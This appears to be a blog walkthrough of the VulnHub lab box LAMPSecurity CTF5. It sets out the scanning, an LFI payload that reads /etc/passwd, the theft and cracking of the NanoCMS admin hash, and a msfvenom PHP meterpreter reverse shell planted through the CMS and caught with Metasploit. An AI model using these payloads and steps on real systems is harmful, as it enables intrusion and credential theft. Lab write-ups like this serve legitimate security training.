Introduction
In this post, You will learn how to crack lampsecurity ctf 5 and below is the video format of the post, Check it out ????????
Visit here to download the box: LAMPSecurity: CTF5 ~ VulnHub
Video
Solving LAMPSECURITY: CTF5
Just follow the below steps and I am sure by end of the post, You will be able to clear the box and have any doubt comment down below or watch the video.
Identifying IP address
To identify the IP of the target I am just enter arp-scan -l or you can enter nediscover commend also.
arp-scan -l
Information gathering using Nmap
I am doing a a full port scan and also scanning for OS, and Service and version.
nmap -A -p- <Target IP> -T4
nmap -A -p- 192.168.1.38 -T4
Save the results and in a file and take a note of the OS and the service and also take a note on what all the ports are open.
While going through the nmap scan we can see multiple ports are open and I am guessing any one of the ports must be vulnerable.
Let’s copy the IP address of the target and paste in a browser and let’s see what we are getting.
Vulnerability analysis
Let’s run nikto and check for any vulnerability or you can also use the open vas or you can also use nessus to find vulnerability.
We will be exploiting the /index.php error because it indicates local or remote file inclusion is possible.
And the target machine is vulnerable to LFI/RFI vulnerability.
Just copy the below malicious code and paste in the browser and make sure you enter the correct atrget IP address.
http://192.168.1.38/index.php?page=../../../../../../../../../etc/passwd%00
We all knew that in /etc/passwd password will be existing and that’swhy we have entered the /etc/passwd
Look here what we got hooray betch ????
I also found some redirect which are quiet fishy and then I took a note of it just click on the blog menu. You will be redirected to http://192.168.1.38/~andy/
And I can see that the site is powered by nanoCMS, Well Nano CMS is an old version of php which is now discontinued.
I have searched on the google for possible vulnerability then I have found this site https://www.securityfocus.com/bid/34508/exploit
So, what it says is the password hash for the NanoCMS will be saved in /data/pagesdata.txt
Then, I enterd http://192.168.1.38/~andy/data/pagesdata.txt
Crack the MD5 Password hash
If you take a look at the password hash you will have an wild guess as MD5. So, I went to Ultimate Hashing and Anonymity toolkit (md5hashing.net) to decode the hash.
We have decoded the hash and the username is admin and the password is going to be shannon
Accessing as admin
Now go to this link and enter the username and password http://192.168.1.38/~andy/data/nanoadmin.php
Creating a reverse PHP shell
Letβs generate a Reverse PHP shell, To generate enter the below command ????????
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f raw
We have generated the reverse PHP shell
Copy from <?php to die() and paste in the new page
Open the NanoCMS Admin panel of the website, navigate to the New Page option and paste the reverse PHP shell in the Content section. Input any name in the Title and click on the Add Page.
Exploiting reverse PHP shell created using msfconsole
Enter these commend to exploit the php shell
msfconsole
msf > use exploit/multi/handler
Set the payloads now ????????
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
Set the lhost and rhost to ????????, Set the lhost as the target IP address
msf exploit(handler) > set lhost 192.168.1.134
msf exploit(handler) > set lport 4444
Now, let’s run the exploit
msf exploit(handler) > run
On the other side if you click on the shell you will get the meterpreter shell
Conclusion
This CTF5 level was little bit tough comparing to CTF4 but anyways it is really fun and there is also manual exploits. Out of 10 I can rate the box 5.5 as the difficulty.
Also Read: Bandit level 0 to 33 full tutorial
Also Read: Lampsecurity:CT4 Tutorial
